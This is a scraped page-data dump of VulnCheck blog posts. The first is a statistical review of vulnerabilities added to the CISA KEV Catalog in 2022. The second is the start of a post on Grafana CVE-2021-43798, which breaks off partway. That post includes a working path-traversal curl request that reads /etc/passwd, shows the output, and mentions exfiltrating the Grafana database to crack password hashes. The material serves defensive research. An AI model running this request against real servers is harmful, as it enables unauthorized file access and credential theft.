Catalog. Without good inventory management and decent vulnerability prioritization, defenders are essentially running a constant fire drill because attackers are eagerly adding new vulnerabilities to their arsenals.",[61,107178,107180],{"id":107179},"named-vulnerabilities","Named Vulnerabilities",[18,107182,107183,107184,107187,107188,107193,107194,107199,107200,107205],{},"Among the 557 newly added CVEs, there were 22 named vulnerabilities added to the KEV Catalog. Of the old vulnerabilities, it’s interesting to see what wasn’t included in the original KEV Catalog when it debuted in 2021. EternalRomance and EternalBlue, a vulnerability that has been widely exploited since the ",[47,107185,106938],{"href":106936,"rel":107186},[51]," leak in 2017, were added to the Catalog in February 2022. Their sibling, EternalChampion, was added alongside ",[47,107189,107192],{"href":107190,"rel":107191},"https:\u002F\u002Ftwitter.com\u002Fgentilkiwi\u002Fstatus\u002F852928424960241664",[51],"EskimoRoll"," in March. A couple of ",[47,107195,107198],{"href":107196,"rel":107197},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FShellshock_(software_bug)",[51],"Shellshock"," vulnerabilities were added in January, and ",[47,107201,107204],{"href":107202,"rel":107203},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FHeartbleed",[51],"Heartbleed"," was added in May.",[18,107207,107208,107209,1246,107213,1246,107218,1255,107223,107228],{},"Of course, it wasn’t only old named vulnerabilities that were added to the list: ",[47,107210,103420],{"href":107211,"rel":107212},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-30190",[51],[47,107214,107217],{"href":107215,"rel":107216},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-34713",[51],"Dogwalk",[47,107219,107222],{"href":107220,"rel":107221},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-0847",[51],"Dirty Pipe",[47,107224,107227],{"href":107225,"rel":107226},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-21990",[51],"SpoolFool"," are some of the CVE-2022 vulnerabilities that were added.",[18,107230,107231],{},"For whatever reason, it felt weird that Log4Shell wasn’t among the 22 named vulnerabilities. Somehow it feels like Log4Shell happened yesterday, but CVE-2021-44228 was added to the Catalog in December 2021. Perhaps Log4Shell feels so fresh because of the long tail of exploitation, reporting, and remediation. The copy-cat names that popped up in 2022 didn’t help either: Spring4Shell (in the Catalog) and Text4Shell (not in the Catalog).",[18,107233,107234],{},"Naming vulnerabilities is fun. There is no doubt about it. But the reality is that a cool logo or a silly name doesn’t impact a vulnerability's usefulness. Since the beginning of 2020, VulnCheck has tracked more than 400 named vulnerabilities. Yet, in 2022, a year that CISA used to add a backlog of historical CVE, only 4% of the CVE added to KEV had an associated name. The other 96% had no names but were useful enough to be exploited in the wild. Think about that the next time you start to panic over a fancy new logo’d vulnerability.",[61,107236,107238],{"id":107237},"whats-being-exploited","What’s being exploited?",[18,107240,107241,107242,107247,107248,107253,107254,107256],{},"One of the surprises among the named vulnerabilities was ",[47,107243,107246],{"href":107244,"rel":107245},"https:\u002F\u002Fwww.jsof-tech.com\u002Fdisclosures\u002Fripple20\u002F",[51],"Ripple20",". Ripple20 is the name of 19 vulnerabilities affecting a TCP\u002FIP stack used by a variety of IoT, IoMT (Internet of Medical Things), and ICS\u002FOT systems. The specific Ripple20 vulnerability in KEV is ",[47,107249,107252],{"href":107250,"rel":107251},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-11899",[51],"CVE-2020-11899",". We may never know if CVE-2020-11899 was used against an ICS\u002FOT network or against a medical network, but by mapping each KEV Catalog vulnerability to affected systems (or components), we can get a general idea of ",[1131,107255,12889],{}," attackers are exploiting. The graph below maps the KEV Catalog entries from 2022:",[1925,107258,107259],{},[18,107260,107261],{},"CISA KEV 2022 Additions Categorized",[11128,107263],{":labels":107264,":values":107265},"[\"Desktop Application\",\"Firmware\",\"ICS\u002FOT\",\"IoMT\",\"IoT\",\"Mobile\",\"Operating System\",\"Server Software\",\"Web Browser\",\"Web Framework\",\"Unassigned\"]","[67,48,46,33,109,32,212,24,58,12,149]",[18,107267,107268,107269,107273],{},"If you add all the columns, you’ll find the number exceeds 557. That’s because some vulnerabilities fit into more than one category. The Ripple20 vulnerability was a great example of that. Another good example is ",[47,107270,107222],{"href":107271,"rel":107272},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-0847",[51],". Dirty Pipe is categorized as “Operating System”, “IoMT”, “Firmware”, and “ICS\u002FOT”. This is entirely based on who has issued advisories for the vulnerability. For DirtyPipe that’s:",[22,107275,107276,107279,107282,107285],{},[25,107277,107278],{},"Operating System: Ubuntu, Debian, RedHat, SUSE",[25,107280,107281],{},"IoMT: GE-Healthcare",[25,107283,107284],{},"ICS\u002FOT: Siemens, Wago, ICS-CERT",[25,107286,107287],{},"Firmware: SonicWall, NetApp",[18,107289,107290],{},"Having completed this exact mapping for all 557 vulnerabilities, we have a few observations. The first is that, over the years, operating system vulnerabilities have been incredibly important for attackers. It’s the top category because it’s the most reliable path for exploitation. Using a Windows vulnerability in a campaign will be much more flexible than, for example, a specific PDF reader. A good operating system patching plan is essential for defenders. This isn’t surprising to anyone (Patch Tuesday is\u002Fwas important for a reason), but it is worth calling out.",[18,107292,107293],{},"Another observation is if you stack “Desktop Application” and “Web Browser”, then you have a fairly large category of vulnerabilities that likely require the user to do something (open a word doc, click a link). These are the favorite targets of a variety of advanced threat actors. Being able to inventory these types of applications and apply patches is a huge headache. But ensuring end users’ browsers and favorite editors are up to date need to be high in the prioritization list.",[18,107295,107296,107297,107302,107303,107308,107309,107312,107313,107316,107317,107320],{},"Finally, after looking through the data, we think “IoT” and “Server Software” are the most important categories. These categories contain items like ",[47,107298,107301],{"href":107299,"rel":107300},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-20038",[51],"CVE-2021-20038"," (SonicWall SMA-100 stack-based buffer overflow) and ",[47,107304,107307],{"href":107305,"rel":107306},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-26136",[51],"CVE-2022-26136"," (Confluence OGNL RCE). These vulnerabilities are largely used by attackers with ",[295,107310,107311],{},"no"," access to the victim network. They use these vulnerabilities to establish initial access ",[1131,107314,107315],{},"without any type of user interaction."," The attacks are incredibly dangerous ",[1131,107318,107319],{},"because"," they don’t rely on access or user mistakes.",[18,107322,107323],{},"We have an idea of what is being exploited by the new CISA KEV Catalog entries, but what about how?",[1920,107325,107327],{"id":107326},"how-is-exploitation-happening","How is exploitation happening?",[18,107329,107330,107331,107336],{},"We previously published a blog, ",[47,107332,107335],{"href":107333,"rel":107334},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fkev-prioritization",[51],"Prioritizing CISA Known Exploited Vulnerabilities",", on the importance of understanding how vulnerabilities are being exploited in order to properly prioritize them for remediation. In that blog, we discussed how VulnCheck breaks down vulnerabilities into seven categories:",[22,107338,107339,107342,107345,107348,107351,107354,107357],{},[25,107340,107341],{},"Initial Access (unauthenticated and remote compromise)",[25,107343,107344],{},"Credentialed Initial Access (authenticated and remote compromise)",[25,107346,107347],{},"Information Leak (unauthenticated and remote data leak)",[25,107349,107350],{},"Denial of Service",[25,107352,107353],{},"Client-Side (user interaction vulnerabilities)",[25,107355,107356],{},"Local",[25,107358,107359],{},"Other (anything that doesn’t fit above)",[18,107361,107362],{},"The CVE added to KEV in 2022 are categorized in the following graph:",[1925,107364,107365],{},[18,107366,107367],{},"CISA KEV 2022 Additions By Vulnerability Type",[78559,107369],{":labels":107370,":values":107371},"[\"Client-Side\",\"Denial of Service\",\"Information Leak\",\"Initial Access\",\"Local\",\"No NVD Vector\",\"Other\",\"Credentialed Initial Access\"]","[185,28,20,200,75,1,7,41]",[18,107373,107374,107375,107377],{},"In the Prioritization blog, which we encourage you to read, we suggest prioritizing Initial Access vulnerabilities. While dangerous, client side, local, and credentialed attacks are simply less of a priority compared to vulnerabilities that can be exploited at will with no user interaction. Prioritizing initial access vulnerabilities makes sense ",[295,107376,297],{}," it immediately drops the defender's high-priority workload. Of the 557 new CISA KEV entries, 200 (35.9%) are initial access vulnerabilities.",[18,107379,107380,107381,107383],{},"The other important aspect of prioritization is ",[1131,107382,106141],{}," is exploiting a vulnerability in the wild. That can further narrow down the CVE prioritization list. So, let’s look at who is exploiting these 557 vulnerabilities.",[1920,107385,107387],{"id":107386},"kev-entries-exploited-in-the-wild","KEV Entries Exploited in the Wild",[18,107389,107390],{},"The KEV Catalog lets everyone know a vulnerability has been exploited in the wild, but that’s it. Not by who. Not where. Not why. Those are all important factors. For example, was the vulnerability exploited by a threat actor that only targets organizations in Southeast Asia, or was it globally exploited to drop ransomware? Those are two very different things to an overworked defender.",[18,107392,107393],{},"We mapped the 557 vulnerabilities to associated threat actors, ransomware, and\u002For botnets. The following graph shows how many of the vulnerabilities are associated with one of those groups (note that this isn’t intended to add up to 557).",[1925,107395,107396],{},[18,107397,107398],{},"CISA KEV 2022 Additions Categorized by Attacker Type",[11128,107400],{":labels":107401,":values":107402},"[\"Threat Actor\",\"Ransomware\",\"Botnet\"]","[241,122,69]",[18,107404,107405],{},"This graph shows, for example, that VulnCheck can link 122 (22%) of the 2022 KEV entries to ransomware. That’s incredibly useful to know for prioritization, but because that type of information isn’t in the KEV Catalog, defenders have to seek that out themselves.",[18,107407,107408],{},"At VulnCheck, we aggregate and curate as much threat intelligence as possible. That’s what allows us to link CVE to particular ransomware crews, botnets, or threat actors. It also allows us to see how much some vulnerabilities are reused. Consider these three tables that show the most reused vulnerabilities from the 2022 KEV entries for ransomware, threat actors, and botnets.",[1925,107410,107411],{},[18,107412,107413],{},"Top 5 CVE Used by Ransomware",[307,107415,107416,107425],{},[310,107417,107418],{},[313,107419,107420,107422],{},[316,107421,319],{"align":24087},[316,107423,107424],{"align":318},"Ransomware Variants",[336,107426,107427,107436,107446,107455,107464],{},[313,107428,107429,107432],{},[341,107430,107431],{"align":24087},"CVE-2013-0074",[341,107433,107434],{"align":318},[295,107435,48192],{},[313,107437,107438,107441],{},[341,107439,107440],{"align":24087},"CVE-2012-0507",[341,107442,107443],{"align":318},[295,107444,107445],{},"42",[313,107447,107448,107451],{},[341,107449,107450],{"align":24087},"CVE-2012-1723",[341,107452,107453],{"align":318},[295,107454,102453],{},[313,107456,107457,107460],{},[341,107458,107459],{"align":24087},"CVE-2010-0188",[341,107461,107462],{"align":318},[295,107463,37766],{},[313,107465,107466,107469],{},[341,107467,107468],{"align":24087},"CVE-2017-0145",[341,107470,107471],{"align":318},[295,107472,24698],{},[1823,107474],{},[1925,107476,107477],{},[18,107478,107479],{},"Top 5 CVE Used By Named Threat Actors",[307,107481,107482,107491],{},[310,107483,107484],{},[313,107485,107486,107488],{},[316,107487,319],{"align":24087},[316,107489,107490],{"align":318},"Named Threat Actors",[336,107492,107493,107502,107511,107520,107529],{},[313,107494,107495,107498],{},[341,107496,107497],{"align":24087},"CVE-2015-5119",[341,107499,107500],{"align":318},[295,107501,37766],{},[313,107503,107504,107507],{},[341,107505,107506],{"align":24087},"CVE-2010-3333",[341,107508,107509],{"align":318},[295,107510,37766],{},[313,107512,107513,107516],{},[341,107514,107515],{"align":24087},"CVE-2014-1761",[341,107517,107518],{"align":318},[295,107519,24698],{},[313,107521,107522,107525],{},[341,107523,107524],{"align":24087},"CVE-2022-22965",[341,107526,107527],{"align":318},[295,107528,723],{},[313,107530,107531,107534],{},[341,107532,107533],{"align":24087},"CVE-2022-30190",[341,107535,107536],{"align":318},[295,107537,37681],{},[1823,107539],{},[1925,107541,107542],{},[18,107543,107544],{},"Top 5 CVE Used By Named Botnets",[307,107546,107547,107556],{},[310,107548,107549],{},[313,107550,107551,107553],{},[316,107552,319],{"align":24087},[316,107554,107555],{"align":318},"Named Botnets",[336,107557,107558,107567,107576,107585,107594],{},[313,107559,107560,107563],{},[341,107561,107562],{"align":24087},"CVE-2018-10561",[341,107564,107565],{"align":318},[295,107566,723],{},[313,107568,107569,107572],{},[341,107570,107571],{"align":24087},"CVE-2018-10562",[341,107573,107574],{"align":318},[295,107575,423],{},[313,107577,107578,107581],{},[341,107579,107580],{"align":24087},"CVE-2016-6277",[341,107582,107583],{"align":318},[295,107584,356],{},[313,107586,107587,107590],{},[341,107588,107589],{"align":24087},"CVE-2015-2051",[341,107591,107592],{"align":318},[295,107593,401],{},[313,107595,107596,107599],{},[341,107597,107598],{"align":24087},"CVE-2017-10271",[341,107600,107601],{"align":318},[295,107602,380],{},[1823,107604],{},[1920,107606,107608],{"id":107607},"time-to-kev","Time to KEV",[18,107610,107611],{},"In this final section, we look at how long it takes for a vulnerability to be added to the KEV Catalog. KEV is not supposed to be an early warning system, and treating it that way is unfair. But it is treated that way, and frankly, it’s interesting to see how long it takes for exploited vulnerabilities to arrive there.",[18,107613,107614,107615,107617],{},"For this discussion, “Time to KEV” is measured from the first public exploit ",[1131,107616,4536],{}," the first public reporting of exploitation in the wild. Measuring from the first public exploit is a little unfair. But there are really two good reasons why we’ve done that:",[1789,107619,107620,107623],{},[25,107621,107622],{},"Open source threat intelligence (including exploitation in the wild details) often significantly lags actual exploitation. Many of the organizations that share this information put it out in detailed reports well after the incident has completed.",[25,107624,107625],{},"A (good) public exploit is a solid indicator of imminent exploitation. We’ve seen this time after time. This only becomes unfair, we think, when the public exploit is bad, but that’s difficult to measure at scale.",[18,107627,107628],{},"Measuring “Time to KEV” for all 557 vulnerabilities is sort of useless. As discussed, the majority of the vulnerabilities are old, and pre-date the KEV Catalog. So we, once again, filtered the 557 CVE down to those CVE-2022 vulnerabilities published in 2022. We performed the calculation and generated the following “Time to KEV” graph.",[1925,107630,107631],{},[18,107632,107633],{},"CISA KEV CVE-2022 Vulnerabilities Added in 2022 \"Time to KEV\"",[11128,107635],{":labels":107636,":values":107637},"[\"Before other sources\",\"Same day\",\"Within 1 week\",\"Within 1 month\",\"Within 3 months\",\"Within 6 months\",\"Within 1 year\",\"More than 1 year\"]","[1,9,38,17,12,9,5,2]",[18,107639,107640,107641,1246,107646,107651],{},"Admittedly, the graph excluded a few vulnerabilities with no public exploits and no public information about exploitation in the wild. For example, a couple of Cisco RV series vulnerabilities (",[47,107642,107645],{"href":107643,"rel":107644},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20701",[51],"CVE-2022-20701",[47,107647,107650],{"href":107648,"rel":107649},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20703",[51],"CVE-2022-20703",") are included in the KEV list and have no public proof of concept or reporting of exploitation in the wild (although we do have some interesting details on these vulnerabilities we’ll share in a few weeks).",[18,107653,107654,107655,107657,107658,107663],{},"For the remainder, the graph shows that 11% of the KEV entries for CVE published in 2022 were added before or on the same day a public exploit or exploitation details were made public. The one vulnerability in our dataset that was added ",[1131,107656,36132],{}," any other data source was ",[47,107659,107662],{"href":107660,"rel":107661},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20700",[51],"CVE-2022-20700",", which again is a Cisco RV series vulnerability. Put a pin in that for a few weeks.",[18,107665,107666,107667,107672],{},"The “same day” additions include vulnerabilities like ",[47,107668,107671],{"href":107669,"rel":107670},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-22047",[51],"CVE-2022-22047",". Microsoft’s advisory indicating exploitation in the wild was released on July 12, 2022, and the vulnerability was added to the KEV Catalog the same day. A perfect response time.",[18,107674,107675,107676,107681],{},"41% of vulnerabilities were added within a week of an exploit or exploitation details being made public. A good example of this is Fortiguard’s ",[47,107677,107680],{"href":107678,"rel":107679},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-40684",[51],"CVE-2022-40684",". On October 10, Fortiguard released an advisory indicating the vulnerability was exploited in the wild, and CISA added the vulnerability to the KEV Catalog on October 11.",[18,107683,107684,107685,107690,107691,107696,107697,107701,107702,107707],{},"The remaining 48% of vulnerabilities took more than one week to be added to the KEV Catalog. An example from that group is ",[47,107686,107689],{"href":107687,"rel":107688},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26500",[51],"CVE-2022-26500",". The vulnerability was added to NVD in March 2022. A ",[47,107692,107695],{"href":107693,"rel":107694},"https:\u002F\u002Fy4er.com\u002Fposts\u002Fcve-2022-26500-veeam-backup-replication-rce\u002F",[51],"technical breakdown and proof of concept"," was shared the same month. A report of ",[47,107698,107700],{"href":106416,"rel":107699},[51],"exploits for sale"," was published in October 2022, and ransomware was ",[47,107703,107706],{"href":107704,"rel":107705},"https:\u002F\u002Fwww.kroll.com\u002Fen\u002Finsights\u002Fpublications\u002Fcyber\u002Favoslocker-ransomware-update",[51],"linked"," to the vulnerability in early December. The vulnerability was added to the KEV catalog on December 13, 2022, nine months after the first public PoC and about two months after initial reports of likely exploitation in the wild.",[18,107709,107710],{},"Of course, such delays aren’t always the fault of CISA (and show bias to how we measured “Time to KEV”). Consider Dogwalk (CVE-2022-34713). The first proof of concept for this vulnerability was published in 2020. Public reporting indicated exploitation in the wild started in Spring 2022. But Microsoft didn’t fix the vulnerability or publish an advisory until August 2022. CISA quickly added the vulnerability to KEV after the Microsoft advisory went public. But that was months after exploitation and years after the first proof of concept.",[18,107712,107713,107714,107717],{},"The KEV Catalog isn’t an early warning system, but warning everyone about exploitation in the wild within a week of the first public exploit or exploitation details at a 52% rate is very respectable. Of course, that doesn’t tell the full story. There are a whole bunch of vulnerabilities published in 2022 that are known to have been exploited and ",[1131,107715,107716],{},"aren’t"," on the CISA KEV list. Next week, we’ll look at those vulnerabilities.",[61,107719,1903],{"id":1902},[18,107721,107722],{},"In this blog we examined the additions to the CISA KEV Catalog in 2022, and we were able to make a series of useful observations:",[22,107724,107725,107728,107731,107734],{},[25,107726,107727],{},"In 2022, defenders saw nearly 2 newly published exploited vulnerabilities in the wild per week.",[25,107729,107730],{},"The KEV Catalog contains a large amount of vulnerabilities that affect operating systems.",[25,107732,107733],{},"Nearly all KEV Catalog entries can be linked to specific threat actors, botnets, or ransomware crews.",[25,107735,107736],{},"For items included in the KEV Catalog, CISA does a respectable job of adding them to the KEV Catalog in a timely manner.",[18,107738,107739],{},"Tune in next week where we’ll discuss the 2022 vulnerabilities exploited in the wild that aren’t in the KEV Catalog.",[18,107741,95204,107742,95208],{},[47,107743,78319],{"href":78319,"rel":107744},[51],{"title":219,"searchDepth":220,"depth":220,"links":107746},[107747,107748,107749,107750],{"id":107087,"depth":220,"text":107088},{"id":107179,"depth":220,"text":107180},{"id":107237,"depth":220,"text":107238},{"id":1902,"depth":220,"text":1903},"A review of the vulnerabilities added to the CISA KEV Catalog in 2022. VulnCheck examines which vulnerabilities were added in 2022, who exploited them, and how long it took to add them to the Catalog.",{"slug":107753,"sitemap":107754},"2022-cisa-kev-review",{"videos":107755,"images":107756},[],[],"\u002Fblog\u002F2022-cisa-kev-review",{"title":107055,"description":107751},"blog\u002F2022-cisa-kev-review",[1279],"p7ONjclWBQIj1JDItYUFGokay2DHLb2TmNCPlFNWKQ8",{"id":107763,"title":107764,"articles":107765,"authors":107774,"body":107776,"date":109212,"description":109213,"extension":234,"image":7,"link":7,"meta":109214,"navigation":237,"path":109216,"seo":109217,"series":7,"stem":109218,"subtype":7,"tags":109219,"__hash__":109220},"blog\u002Fblog\u002Fgrafana-cve-2021-43798.md","Assessing Potential Exploitation of Grafana's CVE-2021-43798 for Initial Access Access - Blog - VulnCheck",[107766,107770],{"title":107767,"source":3494,"link":107768,"date":107769},"Risky Biz News: Russia preparing new Vepr surveillance system","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-russia-preparing-new?utm_source=substack&utm_medium=email","2023-02-22",{"title":107771,"source":3481,"link":107772,"date":107773},"Critical Vulnerabilities You Should Know About","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F02\u002F27\u002Fin_brief_security\u002F","2023-02-27",[107775],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":107777,"toc":109204},[107778,107780,107799,107803,107807,107810,107976,107991,108019,108027,108036,108041,108045,108063,108069,108076,108080,108096,108105,108495,108512,108517,108530,108541,108553,108557,108566,108572,108580,108683,108692,109010,109016,109022,109030,109082,109090,109094,109102,109105,109110,109113,109119,109131,109137,109153,109159,109162,109168,109181,109184,109186,109189,109192,109201],[61,107779,68327],{"id":68326},[18,107781,107782,107783,107787,107788,107793,107794,107798],{},"Grafana is a data visualization web application used by thousands of companies, including SalesForce, JPMorgan Chase, Cisco, and ",[47,107784,81313],{"href":107785,"rel":107786},"https:\u002F\u002Fgrafana.com\u002Fsuccess\u002F?technology=grafana",[51],". That’s likely why there was a lot of interest when ",[47,107789,107792],{"href":107790,"rel":107791},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-43798",[51],"CVE-2021-43798"," was ",[47,107795,90509],{"href":107796,"rel":107797},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20211203190716\u002Fhttps:\u002F\u002Ftwitter.com\u002Fj0v0x0\u002Fstatus\u002F1466845212626542607",[51]," to Twitter as a zero-day on December 3, 2021.",[263,107800],{":list":107801,"ico":266,"title":107802},"[\"CVE-2021-43798 was a zero-day for only a short time. Grafana released an official patch on December 7, 2021, just before the Log4Shell hysteria re-prioritized security teams’ remediation efforts.\",\"Over a year later, 7,500 or 8% of Grafana instances indexed by Shodan remain vulnerable.\",\"We looked at a file disclosure vulnerability affecting Grafana and examined how this issue might be used to gain additional access to the affected system.\",\"Exfiltrating the Grafana SQLite database allows attackers to extract password hashes, brute-force them, and, potentially, establish administrative access on the system.\",\"We recommend patching this vulnerability as soon as possible. If your Grafana server was ever affected by this vulnerability, and exposed to the internet, we also recommend rotating all passwords (data source passwords included).\"]","Assessing Potential Exploitation of Grafana's CVE-2021-43798 for Initial Access",[61,107804,107806],{"id":107805},"details","Details",[18,107808,107809],{},"CVE-2021-43798 allowed a remote and unauthenticated attacker to read arbitrary files on a Grafana server using a simple HTTP request:",[1354,107811,107813],{"className":31740,"code":107812,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl --path-as-is http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\nroot:x:0:0:root:\u002Froot:\u002Fbin\u002Fash\nbin:x:1:1:bin:\u002Fbin:\u002Fsbin\u002Fnologin\ndaemon:x:2:2:daemon:\u002Fsbin:\u002Fsbin\u002Fnologin\nadm:x:3:4:adm:\u002Fvar\u002Fadm:\u002Fsbin\u002Fnologin\nlp:x:4:7:lp:\u002Fvar\u002Fspool\u002Flpd:\u002Fsbin\u002Fnologin\nsync:x:5:0:sync:\u002Fsbin:\u002Fbin\u002Fsync\nshutdown:x:6:0:shutdown:\u002Fsbin:\u002Fsbin\u002Fshutdown\nhalt:x:7:0:halt:\u002Fsbin:\u002Fsbin\u002Fhalt\nmail:x:8:12:mail:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\nnews:x:9:13:news:\u002Fusr\u002Flib\u002Fnews:\u002Fsbin\u002Fnologin\nuucp:x:10:14:uucp:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\noperator:x:11:0:operator:\u002Froot:\u002Fsbin\u002Fnologin\nman:x:13:15:man:\u002Fusr\u002Fman:\u002Fsbin\u002Fnologin\npostmaster:x:14:12:postmaster:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\ncron:x:16:16:cron:\u002Fvar\u002Fspool\u002Fcron:\u002Fsbin\u002Fnologin\nftp:x:21:21::\u002Fvar\u002Flib\u002Fftp:\u002Fsbin\u002Fnologin\nsshd:x:22:22:sshd:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\nat:x:25:25:at:\u002Fvar\u002Fspool\u002Fcron\u002Fatjobs:\u002Fsbin\u002Fnologin\nsquid:x:31:31:Squid:\u002Fvar\u002Fcache\u002Fsquid:\u002Fsbin\u002Fnologin\nxfs:x:33:33:X Font Server:\u002Fetc\u002FX11\u002Ffs:\u002Fsbin\u002Fnologin\ngames:x:35:35:games:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\ncyrus:x:85:12::\u002Fusr\u002Fcyrus:\u002Fsbin\u002Fnologin\nvpopmail:x:89:89::\u002Fvar\u002Fvpopmail:\u002Fsbin\u002Fnologin\nntp:x:123:123:NTP:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\nsmmsp:x:209:209:smmsp:\u002Fvar\u002Fspool\u002Fmqueue:\u002Fsbin\u002Fnologin\nguest:x:405:100:guest:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\nnobody:x:65534:65534:nobody:\u002F:\u002Fsbin\u002Fnologin\ngrafana:x:472:0:Linux User,,,:\u002Fhome\u002Fgrafana:\u002Fsbin\u002Fnologin\n",[886,107814,107815,107827,107832,107837,107842,107847,107852,107857,107862,107867,107872,107877,107882,107887,107892,107897,107902,107907,107912,107917,107922,107933,107938,107943,107948,107953,107958,107963,107968],{"__ignoreMap":219},[1373,107816,107817,107819,107821,107824],{"class":1375,"line":1376},[1373,107818,55482],{"class":2206},[1373,107820,2222],{"class":1391},[1373,107822,107823],{"class":2209}," --path-as-is",[1373,107825,107826],{"class":1391}," http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\n",[1373,107828,107829],{"class":1375,"line":220},[1373,107830,107831],{"class":2206},"root:x:0:0:root:\u002Froot:\u002Fbin\u002Fash\n",[1373,107833,107834],{"class":1375,"line":1266},[1373,107835,107836],{"class":2206},"bin:x:1:1:bin:\u002Fbin:\u002Fsbin\u002Fnologin\n",[1373,107838,107839],{"class":1375,"line":1852},[1373,107840,107841],{"class":2206},"daemon:x:2:2:daemon:\u002Fsbin:\u002Fsbin\u002Fnologin\n",[1373,107843,107844],{"class":1375,"line":4692},[1373,107845,107846],{"class":2206},"adm:x:3:4:adm:\u002Fvar\u002Fadm:\u002Fsbin\u002Fnologin\n",[1373,107848,107849],{"class":1375,"line":4724},[1373,107850,107851],{"class":2206},"lp:x:4:7:lp:\u002Fvar\u002Fspool\u002Flpd:\u002Fsbin\u002Fnologin\n",[1373,107853,107854],{"class":1375,"line":4756},[1373,107855,107856],{"class":2206},"sync:x:5:0:sync:\u002Fsbin:\u002Fbin\u002Fsync\n",[1373,107858,107859],{"class":1375,"line":4768},[1373,107860,107861],{"class":2206},"shutdown:x:6:0:shutdown:\u002Fsbin:\u002Fsbin\u002Fshutdown\n",[1373,107863,107864],{"class":1375,"line":4792},[1373,107865,107866],{"class":2206},"halt:x:7:0:halt:\u002Fsbin:\u002Fsbin\u002Fhalt\n",[1373,107868,107869],{"class":1375,"line":4798},[1373,107870,107871],{"class":2206},"mail:x:8:12:mail:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\n",[1373,107873,107874],{"class":1375,"line":4806},[1373,107875,107876],{"class":2206},"news:x:9:13:news:\u002Fusr\u002Flib\u002Fnews:\u002Fsbin\u002Fnologin\n",[1373,107878,107879],{"class":1375,"line":4817},[1373,107880,107881],{"class":2206},"uucp:x:10:14:uucp:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\n",[1373,107883,107884],{"class":1375,"line":4825},[1373,107885,107886],{"class":2206},"operator:x:11:0:operator:\u002Froot:\u002Fsbin\u002Fnologin\n",[1373,107888,107889],{"class":1375,"line":4835},[1373,107890,107891],{"class":2206},"man:x:13:15:man:\u002Fusr\u002Fman:\u002Fsbin\u002Fnologin\n",[1373,107893,107894],{"class":1375,"line":4843},[1373,107895,107896],{"class":2206},"postmaster:x:14:12:postmaster:\u002Fvar\u002Fmail:\u002Fsbin\u002Fnologin\n",[1373,107898,107899],{"class":1375,"line":4849},[1373,107900,107901],{"class":2206},"cron:x:16:16:cron:\u002Fvar\u002Fspool\u002Fcron:\u002Fsbin\u002Fnologin\n",[1373,107903,107904],{"class":1375,"line":4877},[1373,107905,107906],{"class":2206},"ftp:x:21:21::\u002Fvar\u002Flib\u002Fftp:\u002Fsbin\u002Fnologin\n",[1373,107908,107909],{"class":1375,"line":4915},[1373,107910,107911],{"class":2206},"sshd:x:22:22:sshd:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\n",[1373,107913,107914],{"class":1375,"line":4931},[1373,107915,107916],{"class":2206},"at:x:25:25:at:\u002Fvar\u002Fspool\u002Fcron\u002Fatjobs:\u002Fsbin\u002Fnologin\n",[1373,107918,107919],{"class":1375,"line":4947},[1373,107920,107921],{"class":2206},"squid:x:31:31:Squid:\u002Fvar\u002Fcache\u002Fsquid:\u002Fsbin\u002Fnologin\n",[1373,107923,107924,107927,107930],{"class":1375,"line":4952},[1373,107925,107926],{"class":2206},"xfs:x:33:33:X",[1373,107928,107929],{"class":1391}," Font",[1373,107931,107932],{"class":1391}," 